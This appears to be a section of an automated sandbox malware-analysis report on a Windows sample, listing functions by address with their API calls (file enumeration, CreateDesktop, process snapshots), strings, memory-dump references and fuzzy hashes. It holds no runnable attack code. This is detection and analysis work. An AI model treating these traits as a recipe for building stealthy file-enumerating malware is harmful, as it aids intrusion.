                                                                                                                                                                                                                                                                                            • Instruction ID: f96707184f20121d0bda5babc62ec9bbf22f85a6a0252dbd6d8119ede72c3401
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93ba6a4fb0da29434ce8e6e354f19ad1ebedb407e9703d29a19c9622524f0e29
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97318DB67011109FDB14DBACDCC0BA973B5AFCA308F054878E019D3352DB38AE198B59
                                                                                                                                                                                                                                                                                            Function 00428248 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset$FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: %s\*.*
                                                                                                                                                                                                                                                                                            • API String ID: 2180624105-1013718255
                                                                                                                                                                                                                                                                                            • Opcode ID: ee3cd0bef39285e60ec048c7d744cdacfd10b79e9f049abb3da976af403e7ac3
                                                                                                                                                                                                                                                                                            • Instruction ID: 0a6b2ea63025e97e5e598bf4e61c55c08c71b8a32124561313a11673bac0cd5d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee3cd0bef39285e60ec048c7d744cdacfd10b79e9f049abb3da976af403e7ac3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8611E776A002445BD710DB99DC85D9B3BACDB8A350F05017CF919D3342E6789F58CBA4
                                                                                                                                                                                                                                                                                            Function 0040B846 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateDesktop
                                                                                                                                                                                                                                                                                            • String ID: %s%s"$OCALAPPDATA
                                                                                                                                                                                                                                                                                            • API String ID: 3054513912-3945843140
                                                                                                                                                                                                                                                                                            • Opcode ID: 860e00e64f807195728f0608d2f0bd4457fba2b31b2b7ff1c9972e30e191eb60
                                                                                                                                                                                                                                                                                            • Instruction ID: 3d2972af386316d9be50767083905085ccda19580b27f6f880edc31ac63f85e4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 860e00e64f807195728f0608d2f0bd4457fba2b31b2b7ff1c9972e30e191eb60
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8310876A502008BD714DF68DDC0BA937F4EF9A704F08816DE809D7312E674EA95CB59
                                                                                                                                                                                                                                                                                            Function 004018DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 004019DA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: 0%E$0%E
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-386105745
                                                                                                                                                                                                                                                                                            • Opcode ID: 3c1b4fee3c951a545f55fd42dc46924680b74bce36de95e4240348f77afb1a4e
                                                                                                                                                                                                                                                                                            • Instruction ID: 384581a553c9b641a9d9dadc207eefd58bf68b9b5068ecbce6f45e1e004277aa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1b4fee3c951a545f55fd42dc46924680b74bce36de95e4240348f77afb1a4e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D13120BAA001649FC704DF98DC91AAD73B9EFC5608B08446CB51AE3351EA74BF45CB58
                                                                                                                                                                                                                                                                                            Function 0040177C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 004019DA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: 0%E$\*.*
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-1912814562
                                                                                                                                                                                                                                                                                            • Opcode ID: 45da029c2d2ac17479f9af7bbc5d6394cf2116e07b0005f993176921ea4e3c3e
                                                                                                                                                                                                                                                                                            • Instruction ID: 22346f696f13e9549d8facf84d4ffd02b2e8a1bb9ee0c0cc419566cfbec9e226
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da029c2d2ac17479f9af7bbc5d6394cf2116e07b0005f993176921ea4e3c3e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A3140BAA001659FC715DF98DCA1AED73B4FF86308B04447CA519E3251EA34BF49CB58
                                                                                                                                                                                                                                                                                            Function 00412AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00412B77
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: j(E$j(E
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-4173197725
                                                                                                                                                                                                                                                                                            • Opcode ID: 219f719297c6cbb6f48a629ba439f8744997e797cd7ddcf31338611ae8ca9535
                                                                                                                                                                                                                                                                                            • Instruction ID: 8bab2d8d4da6b135567d6663b7f8523f409fe4a46747f795839d2863d3a3a458
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 219f719297c6cbb6f48a629ba439f8744997e797cd7ddcf31338611ae8ca9535
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA2192BAB002049FCB18DBACEC81EDD73B6EFC6305B184124A815D3351DA34AE15CB59
                                                                                                                                                                                                                                                                                            Function 0040E749 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0040E7FD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: j(E
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-3790244945
                                                                                                                                                                                                                                                                                            • Opcode ID: ca8952b2d87523698d5ab2caeaa578ab4bbb1f7eb8d0a0ed884b13eb9ba42fca
                                                                                                                                                                                                                                                                                            • Instruction ID: 6d01b9231f5bbaf653de1ab32846f44ac3f5364cab858fddac85960c65a6f770
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca8952b2d87523698d5ab2caeaa578ab4bbb1f7eb8d0a0ed884b13eb9ba42fca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2521DB366002048FCB14DF9CCCC4FA937A5AB8A314F044538B429E7352DA34AA18CB5A
                                                                                                                                                                                                                                                                                            Function 0041008C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00410141
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: 46a0960487acdacf2fd8ef0d0d4f45aa313d752388bab4cdc5630ddcade3ae05
                                                                                                                                                                                                                                                                                            • Instruction ID: 71774e874bff6838fcadcdfaea7023f42c996f402008a6bac7216c547bb6b296
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a0960487acdacf2fd8ef0d0d4f45aa313d752388bab4cdc5630ddcade3ae05
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51218B3A7001549BCB14CFACDCC9F9977B5EF8A308F044079A519E3391EA34AE19CB69
                                                                                                                                                                                                                                                                                            Function 004291EA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00429256
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-4073750446
                                                                                                                                                                                                                                                                                            • Opcode ID: 17400cc20f939fb2ea047b134b98f59f63716dce399d062876eda283c47b5410
                                                                                                                                                                                                                                                                                            • Instruction ID: 48a9b12bb2e10cf1fcdd8e6fb660103a8b5b91703090a48299523f0d276b014d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17400cc20f939fb2ea047b134b98f59f63716dce399d062876eda283c47b5410
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F00128753102049FD708EB68DC81DA633ACFBC5310B004938B915CB352EB34ED49C768
                                                                                                                                                                                                                                                                                            Function 0042A4E5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0042A548
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-766152087
                                                                                                                                                                                                                                                                                            • Opcode ID: 147f18f658a4627c497f47d40985670674bd45b1b97b9c5dcec16a5a094effb5
                                                                                                                                                                                                                                                                                            • Instruction ID: 0609e92204065f63010fd7ad1d7f6de40c2cf777a2a57bed9933e9f42ca579c2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 147f18f658a4627c497f47d40985670674bd45b1b97b9c5dcec16a5a094effb5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901FE76D012145FD704DF55ECC1DAA3B79AF86325B054038E81AF7391E630EE58C7A4
                                                                                                                                                                                                                                                                                            Function 0041F9A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                                                                                            • String ID: ".E
                                                                                                                                                                                                                                                                                            • API String ID: 31276548-3376019375
                                                                                                                                                                                                                                                                                            • Opcode ID: 1b2d5af43dd12cc97f1ca22d2a4559b3dc75b8610e382d2f08405efa2324d8b1
                                                                                                                                                                                                                                                                                            • Instruction ID: d6f07fd9729eab18bf35d97595002372c1d2e6aa75cde9e8f8970a3912b3b12f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b2d5af43dd12cc97f1ca22d2a4559b3dc75b8610e382d2f08405efa2324d8b1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F0A0B7A000186BD2209759FC81D9B77ADEFCA21CB090121FA5993311E2256E1E86BA
                                                                                                                                                                                                                                                                                            Function 0042BD1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0042BD60
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                                                                            • API String ID: 1974802433-766152087
                                                                                                                                                                                                                                                                                            • Opcode ID: c3e509897c29787022350f80ffc0ff6cef781e262badee9c2a4ab92802de6c54
                                                                                                                                                                                                                                                                                            • Instruction ID: 931b0de070de10b7e66256f6a66663b599e1610311875de6a1b42976d5bd7aee
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3e509897c29787022350f80ffc0ff6cef781e262badee9c2a4ab92802de6c54
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF054B66202059FD704DF6CEC91D6A33ECAB85214F040939BC15D3352EA75B9088B54
                                                                                                                                                                                                                                                                                            Function 0041F53D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28timeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 0041F573
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                                                                                                                                                            • String ID: 6l
                                                                                                                                                                                                                                                                                            • API String ID: 565725191-3579878408
                                                                                                                                                                                                                                                                                            • Opcode ID: d1f1aa9db316d0556c24cff3fcebf8ffe5a39d00abe2e1027b6969b4bb4cace5
                                                                                                                                                                                                                                                                                            • Instruction ID: 51eb3bd1622886aac5f8ccd9b6177312287d20add2d8b6e62fb82a58f3c5e34c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f1aa9db316d0556c24cff3fcebf8ffe5a39d00abe2e1027b6969b4bb4cace5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52E092BA700200BBD32CDF3CDDD5F5A36A99B86364B15463CB125CB3D9D9719C148658
                                                                                                                                                                                                                                                                                            Function 004201FF Relevance: 3.0, APIs: 2, Instructions: 33processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042023A
                                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0042024A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2353314856-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 51a0a3a86996dd71d6c256b735e4ff4c0fdb01524f04b67741bc59405e23ec16
                                                                                                                                                                                                                                                                                            • Instruction ID: c579f703dafad097f5d9c0689e3975df6c889f8e9946543bcf98fd5d00d92f8f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a0a3a86996dd71d6c256b735e4ff4c0fdb01524f04b67741bc59405e23ec16
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F0BE767003215BDB24CF2ADC85F5BBBA9FBC6300F084819B455CB391CA70D814CB69
